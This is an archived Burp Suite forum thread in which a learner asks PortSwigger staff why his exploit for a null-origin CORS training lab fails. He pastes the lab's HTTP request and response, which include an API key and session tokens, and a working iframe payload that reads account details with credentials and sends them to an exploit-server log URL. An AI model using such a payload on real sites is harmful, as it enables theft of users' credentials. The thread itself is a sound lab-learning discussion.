Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Issue with Exploiting Null Origin CORS Vulnerability Due to X-Frame-Options Restriction

Shivam | Last updated: Aug 12, 2024 05:15PM UTC

Dear PortSwigger Team, I am currently working on a lab exercise that is vulnerable to a null origin CORS vulnerability. According to the lab instructions, we need to exploit this vulnerability by crafting an iframe and JavaScript code. However, I have encountered an issue. The target site includes the following headers in its response: HTTP/2 200 OK Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 The response contains the X-Frame-Options: SAMEORIGIN header, which restricts the site from being loaded in an external iframe. This restriction prevents us from following the provided solution to use an iframe for the exploit. Given this situation, how should we proceed to exploit the null origin CORS vulnerability? The current solution relies on loading the vulnerable endpoint in an iframe, but the X-Frame-Options header prevents this approach. LAB LINK: https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack Community solutions LINK: https://www.youtube.com/watch?v=UVB5SH21Ygk Fix this issue as soon as possible. Thank you for your assistance.

Michelle, PortSwigger Agent | Last updated: Aug 13, 2024 02:34PM UTC

Hi Thanks for getting in touch. I've just tested this lab and could see the apikey in the exploit server logs. Are you using Burp's embedded browser when trying to solve this lab or an external browser? If you are using Burp's embedded browser, which version of Burp are you using? What do you see when you click on View Exploit or try to deliver the exlpoit to the victim?

Shivam | Last updated: Aug 14, 2024 10:12AM UTC

Hi Michelle, I was using Firefox and Burp's embedded browser to solve the lab, but I am still facing the same issue. I've pasted the request and response below for your analysis. Could you please help me identify where the issue might be and how to fix it as soon as possible? Burp Suite version: 2023.12.1.3 Request: GET /accountDetails HTTP/2 Host: 0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net Cookie: session=cccc Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Origin: null Referer: https://0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i RESPONSE HTTP/2 200 OK Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 189 { "username": "wiener", "email": "", "apikey": "a7m7zPuQFBjjMUqsho66HqSNWD8Y5U9v", "sessions": [ "dUXqIYPLO4kNzMV1sxv7I9rKjQHVRP3x", "GEPdHJnPqFg1vY4mfeP2DpfjFKxfXOK2" ] } I used the following code to solve the lab: <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a9b0056036a2ac087b4e72300e100d9.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='https://exploit-0a3300af03692aa3872fe6ae01df0075.exploit-server.net/log?key='+this.responseText; }; </script>"></iframe> When I paste this code into the exploit server and click "View Exploit," the browser doesn’t load the lab site. Please let me know how I can resolve this issue. Thanks for your reply. Shivam

Michelle, PortSwigger Agent | Last updated: Aug 14, 2024 03:36PM UTC